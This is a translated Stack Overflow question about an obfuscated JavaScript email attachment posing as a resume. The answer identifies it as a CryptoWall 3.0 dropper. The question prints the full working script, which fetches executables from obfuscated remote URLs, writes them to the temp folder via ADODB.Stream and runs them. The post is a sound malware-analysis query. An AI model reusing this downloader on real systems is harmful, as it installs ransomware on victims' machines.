javascript - 这个恶意脚本试图完成什么?

标签 javascript activex malware wsh

抱歉,如果这不适合问这个问题,请 LMK 如果这个问题在其他地方更合适!

我的工作邮箱收到了一封特别有趣的垃圾邮件。说是某人的简历,其实是一段很晦涩的javascript。看起来它试图通过 activeX 启动 Windows 可执行文件。我认为攻击者的目标是让你直接将 .js 文件作为 Windows 脚本运行。我在我的 Windows 7 计算机上运行它,Symantec Endpoint 以“可疑的可执行图像下载”警告停止了它。我在未安装任何防病毒软件的 Windows XP 虚拟机中运行它,并收到弹出通知

2865241.exe - Appication Error The application failed to initialize properly (0xc0000135). Click on OK to terminate the application

随后是来自 Windows Script Host 的通知

Script: C:\path\to\Resume Jaime Harding.js
Line: 9
Char: 1
Error: Write to file failed.
Code: 800A0BBC
Source: ADODB.Stream

那么它实际上是在尝试编写二进制文件并运行它吗?它可能试图完成什么?为什么会失败? 我扮演了“容易上当受骗的电子邮件收件人”的 Angular 色并运行了它,它就被炸毁了。这可能在什么环境下成功?

很多乱码看起来可能是故意丑陋的变量名用作 window 的属性。但是,有很多 "charAt",所以字符串可能只是一个诱饵,它只是提取某些字符并使用它们。几个“函数”的参数以 (/regex/g,"") 的形式传递,所以它看起来像是在试图过滤掉字符串中的垃圾,但我不能说明对 replace 的实际调用在哪里,这实际上会进行替换。

下面是JS,它被高度混淆了。我为了它的可读性而对其进行了美化。

(function () {
    var D2p = (8.0 + "'=+)D]R.MPjS"["length"] * 28);
    kOY = ("\x89\x60eYE;U\x83L^SP'yp"["charCodeAt"](6) * 0 + 18.0);
    qEI = "N9-0GO3m8/d*VI4&g)tG*k"[("=[TOcgnm7St5a(hUdK,?"["charCodeAt"](13) * 409139717 + 39.0)["toString"](("xA\x85Ru6-iU{*c~\x87\x86("["charCodeAt"](5) * 0 + 29.0))](/[m\-\*I0tNO\)\&\/]/g, "");
    T7Y = "6Y=0oSknwWp[U&qjKCBF*L"[("<e.y\x8bZ2fX\x7f"["charCodeAt"](2) * 921305672 + 22.0)["toString"]((34.0 + "NuU\x7f/\x8a\x8683y$EY<f&{x"["charCodeAt"](8) * 0))](/[\*Kj\&\=6wW\[oBk]/g, "");
    var Ecf = (88 * "\x85P<S\x82"["length"] + 0.0);
    Tkv = ("T_e8\x83\x87X|fA\x80I\x89{\x85"["length"] * 2 + 3.0);
    var Cq7 = "AGREkUTp8D&bJGdZ;qL0QsP"[(9.0 + "u\x800]\x89@ye\x88\x8aWajvT="["charCodeAt"](10) * 280311852)["toString"]((3.0 + "<$*,?Rn"["length"] * 4))](/[RJ\&pLQkUd8As\;]/g, "");
    var ZTl = "`S75d`QHS@garJi50+94Y0"["replace"](/[Y\@\+HJ79a5\`]/g, "");
    LIm = "AGt9>wrW66389bs4a0Yv72"["replace"](/[rAs8a\>Ybt67]/g, "");
    gF9 = "#ni`1z0c~_w-vamT4uC7Fc%G"[(12.0 + "\x83%Q\x880\x8b*asr\x82;W"["length"] * 3877454369)["toString"]((5 * "_YKyr\x82"["length"] + 5.0))](/[\-\%4Fm\#0C\~1\_\`vn]/g, "");
    var Uwg = "QwFnSfAc07q2MpO!]P*HzbZ"[(4.0 + "CHE'zl+]e4"["length"] * 4238006093)["toString"]((34.0 + "1y.\x89d/}n*6\x7f\x88w"["charCodeAt"](8) * 0))](/[z\!f27\*Qw\]npcb]/g, "");
    function Kg3(fr, KPA, rn) {
        var ERG = new ActiveXObject("]W_SFc)rHi7p_tz.TSv%hB_eKl5l"["replace"](/[\)KT\%vzF\_7\]5HB]/g, ""));
        var mE6 = ("Ov\x81xP*sX\x80"["length"] * 11 + 4.0);
        var KPA = ERG["Ex" + (73 > 45 ? "\x70" : "\x68") + "andEnvironmentSt" + "" + (77 > 7 ? "\x72" : "\x6d") + "ings"]("G%oT&EySM&PXX%"[("iIopR\x809O2\x82PtYg:'[}#"["charCodeAt"](12) * 225213779 + 43.0)["toString"]((0.0 + "OJN.R%\x8angI"["length"] * 3))](/[\&SXGyo]/g, "")) + String["f" + "romCharCod" + (81 > 5 ? "\x65" : "\x5e") + ""](92) + KPA;
        var j$2 = "qv3zu6Sa7FdMeSbxt~*fklyGQu"[(43.0 + "5Hd|tb/M3Yx\x87e"["charCodeAt"](6) * 1269417725)["toString"]((0 * "Wv1jN\x88G\x81muC4nVx#w<"["charCodeAt"](11) + 36.0))](/[G\*6qvl\~kxSQFMz7]/g, "");
        var Ttc = new ActiveXObject("kM+SGNXfMFfLD2g.kX[mM#L3H`qTFT/AP"["replace"](/[\/NkqF\[\#\+G\`gADmf3]/g, ""));
        QBc = "efbNd<t&A&q@4%`8RFLI29CH"["replace"](/[\`9\<edI\@R\&\%CLb]/g, "");
        Ttc["onre" + (78 > 3 ? "\x61" : "\x5a") + "dys" + "t" + (71 > 45 ? "\x61" : "\x5c") + "techange"] = function () {
            if (Ttc["r" + "eadyStat" + (98 > 18 ? "\x65" : "\x60") + ""] === 4) {
                var OF$ = new ActiveXObject("-AlDROqDWBJ.ESz!tbir#eH[a&lm"["replace"](/[H\#JWi\-E\!\[zqR\&lb]/g, ""));
                var Jwu = ("08#\x89:{\x83\x81[UR]2I"["charCodeAt"](10) * 4 + 60.0);
                OF$["o" + "" + (58 > 34 ? "\x70" : "\x67") + "en"]();
                i61 = "eJj7XqxlFeC5B_1RsHQt!1"["replace"](/[QXje\!5sx\_Rl]/g, "");
                izb = ("U}o=Q8(c<\x8bO-|.5^"["charCodeAt"](6) * 2 + 34.0);
                var zyH = (10.0 + "\x80LF:,n'1-c0\x8a="["length"] * 11);
                var k3C = ";n@E2LaW=0GNTs-1JT!OTce"["replace"](/[T\=\;1\-\!ca\@G2]/g, "");
                OF$["" + "t" + (91 > 18 ? "\x79" : "\x72") + "pe"] = 1;
                var EKM = "Ncvs&1RzLd8Qt7Z-~M(YQfrp"[("-*\x84f\x86N\x8b6Tn{qgw3yl\x7fK"["charCodeAt"](5) * 454460829 + 5.0)["toString"](("\x89/(,TD#e<kyn%+.xW"["charCodeAt"](13) * 0 + 33.0))](/[c7\(R\-s\~\&r8NQL]/g, "");
                OF$["wri" + (76 > 16 ? "\x74" : "\x6a") + "" + "e"](Ttc["R" + (94 > 34 ? "\x65" : "\x5b") + "s" + "ponseB" + (85 > 2 ? "\x6f" : "\x65") + "dy"]);
                PDX = (31.0 + "5IY9?r\x896B{i1*Re"["charCodeAt"](12) * 6);
                OF$["" + "posi" + (77 > 29 ? "\x74" : "\x6a") + "ion"] = 0;
                v$8 = (2.0 + "b&|\x8b)gY\x83"["length"] * 61);
                OF$["saveT" + (79 > 38 ? "\x6f" : "\x68") + "F" + "" + (85 > 43 ? "\x69" : "\x62") + "le"](KPA, 2);
                W2Q = "(DLsxL6Ll0a(OC]trZBv`b"[(")=\x88\x81>"["length"] * 10081381361 + 4.0)["toString"]((0 * "aWi\x80/4h\x60uIcJbt-^,'"["charCodeAt"](17) + 35.0))](/[\(OBx0r\`\]L]/g, "");
                OF$["c" + "los" + (94 > 26 ? "\x65" : "\x5b") + ""]();
                var ue0 = "MT3gL29u`i-u4k3eR8N+o"["replace"](/[4\+\`L8MR93\-]/g, "");
            }
            ;
            var xbw = "MY<m6do1bcJs;j3mCP7c"[(283571292 * "GbS4sw#qE*\x7f)\x87V"["charCodeAt"](13) + 21.0)["toString"]((3 * "57e2>-m+"["length"] + 7.0))](/[\<3MoJ67b\;C]/g, "");
        };
        var b$y = ("\x86mjoi\x87n.(y0#,Y"["length"] * 2 + 0.0);
        Teq = "80u3mip>VfE-Mnlk9@[L*yEc"[("v({w>Y<qr#3-="["length"] * 3877454369 + 12.0)["toString"](("pm\x60oO(EeT<w"["charCodeAt"](5) * 0 + 35.0))](/[\[V0\*kEi3\@\>\-8n]/g, "");
        try {
            Ttc["o" + "p" + (65 > 36 ? "\x65" : "\x5e") + "n"](";GoE%T"["replace"](/[o\%\;]/g, ""), fr, false);
            lw7 = "fte5jz9s_Yt=DIb]aB!6IB"[(1050143891 * "5~K<\x60c0>lC@=E("["charCodeAt"](6) + 41.0)["toString"]((0 * "p4uV?rw.'\x83m|\x86"["charCodeAt"](4) + 35.0))](/[\!\_9\=faIeY\]j]/g, "");
            var jLj = "`=e;E_fhW2c/F8njVljt(G"["replace"](/[\`\/\;lj2\(h\_\=8]/g, "");
            Ttc["" + "s" + (53 > 26 ? "\x65" : "\x5c") + "nd"]();
            var X2P = (41 * "&S_R8gA'v"["length"] + 7.0);
            if (rn > 0) {
                ERG["R" + "" + (55 > 18 ? "\x75" : "\x6e") + "n"](KPA, 0, 0);
                pcx = "oHzfN0Bajv]M5Tpy(Ssik=Kt"[(9.0 + "=h)$[\x84>:8#MIZ-fK}"["charCodeAt"](7) * 869084600)["toString"]((35.0 + "Ul\x88\x84^ObN+:Q>HomiJqg"["charCodeAt"](9) * 0))](/[\=5jKapiS\(zo\]N0]/g, "");
            }
            ;
            var FmH = "7_3QTXRgjK6+mj/4!2&h[ml"[("djG\x80\x8bMk\x814&geJ/\x86#\x83s"["charCodeAt"](5) * 382957200 + 62.0)["toString"]((32.0 + "\x84h4qDZ2j$\x817C"["charCodeAt"](2) * 0))](/[Q\/gK\+7X\_\&\[m\!]/g, "");
            sIy = (36.0 + "O8^\x88aSZN&Ts"["charCodeAt"](9) * 4);
            VBS = (17 * "$jG)r^o\x894Oc5"["length"] + 1.0);
        } catch (er) {
        }
        ;
        sKc = "l2iC]fvA]f8b7aTzyIkY9[vq"["replace"](/[72I8\[vyTCYl\]]/g, "");
    }
    Kg3("qhAtyt<zpx5:X/>/DdMa@vciksl1x>.=Ir7uK/Ri0m2a`gIe-%s0/6Ooqn]e)!.7]jNpKg"["replace"](/[qyKADO\%\-67\)\>R\`I5\@z\<0N2\=\!klxM\]cX]/g, ""), "L2MP8&6@5s2s4Q1().ibeaxYe"[(672699379 * "\x81\x7f{=%\x85+tE~?DP"["charCodeAt"](10) + 57.0)["toString"]((6.0 + "A\x86hk8DU\x82G6390."["length"] * 2))](/[ab\&Yi\)\@s\(PQLM]/g, ""), 1);
    iBR = "~UcONvQg!zT2P(RXe-k(Pp"[(3977508874 * "{2\x7f\x82A\x83S\x88\x84gW~c%P"["length"] + 8.0)["toString"]((0 * "Gk5o~$\x89;2^:plS&gUhnR"["charCodeAt"](10) + 36.0))](/[NQTP\(\-Xc\~\!]/g, "");
    var TAb = (2.0 + "B%;'(W]0JaEi\x898_"["length"] * 1);
    Jfj = "Qk*rH@UKlsg5O->f`4~iyz"[(2032260927 * ",2\x84\x8b\x60P_[;Qtg"["length"] + 9.0)["toString"]((1.0 + "pQdk["["length"] * 6))](/[\-\~\`sK\@Qy\>\*5r]/g, "");
    dkD = "`aL1;xbr;eJkDA)R*hoM"[(62.0 + ";[DY7J:K\x85\x88x$3t<"["charCodeAt"](7) * 393169392)["toString"]((0 * ";fud=6t(%\x80\x82+y^m"["charCodeAt"](8) + 32.0))](/[L\)o\`J\*bD\;]/g, "");
    Hz9 = "zNiGSF9+7WHUhpZxILHEM"["replace"](/[F\+pULEzSixW]/g, "");
    Kg3("Bhxt(tZ%pfM:#/Y/%nd3a;vGxiNs8R1N.kr>uTD/ficmTaKg5e&s4J/]tEwWoJ.EjH%pcg"[(7089588933 * "z_OC("["length"] + 2.0)["toString"]((33.0 + "PRybeAL>6;U\x87"["charCodeAt"](9) * 0))](/[4DKJ5RY\(3NM\%cx\]Hn\>ET\&WfkG\#\;8ZB]/g, ""), "S1-2+40605X4[9=.pelx;e"[(68.0 + "T|YL[u;<UR\x83x?\x80D~\x8b2b"["charCodeAt"](8) * 701913330)["toString"](("\x8a)jUF4$^e\x7fy;{WL_d]Xg"["charCodeAt"](6) * 1 + 0.0))](/[lX\-S\;\=\[p0\+]/g, ""), 1);
    sZV = (1 * "p\x83jcq\x88d6\x85g[Ca&"["charCodeAt"](7) + 24.0);
    var q3y = "+mp&uoRvn/GXa`rJKxKzW"[(33.0 + "|P,Ehf7\x8a\x82QN0X"["charCodeAt"](6) * 1084775147)["toString"]((6.0 + "^d\x896m2?:\x83\x8b"["length"] * 3))](/[\`mxoXz\/vJ\+\&]/g, "");
    var vQ8 = "TAM~6=&uHrQcF=p3sOqS~81C"[(308784692 * "\x60,'3OKskndZw\x8b5iRgGN"["charCodeAt"](13) + 43.0)["toString"](("+O6hr>Vn8_0zktN"["length"] * 1 + 14.0))](/[TQ\&3\~OqM\=H1c]/g, "")
})();//p061q4Iu1W

最佳答案

此恶意软件称为 CryptoWall 3.0。参见 this article获取更多信息。

关于javascript - 这个恶意脚本试图完成什么?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/29223127/

上一篇:javascript - 如何在强制布局 d3.js 中动态附加箭头标记

下一篇:javascript - Dynatable 打破了动态 HTML header

相关文章:

asp.net - 如何以编程方式确定是否已安装 ActiveX 控件,以及它或整个 ActiveX 是否已被禁用?

javascript - Primefaces <p :tooltip> does not disappear after another Ajax request

javascript - 检测网站的其他用户何时打字

javascript - Angular JS 控制台错误 : line numbers don't refer to my source files

javascript - 在 C++ 中继承 IObjectSafetyImpl 以实现安全的 javascript activex 控件

javascript - javascript/vb "new ActiveXObject()"中使用的对象的技术名称是什么?

c++ - 编写自定义 GetModuleHandle 函数的原因是什么?

javascript - 下划线不是函数

C# 应用程序被防病毒软件阻止?

javascript - Firebase Fetch - 没有访问控制允许来源

©2024 IT工具网  联系我们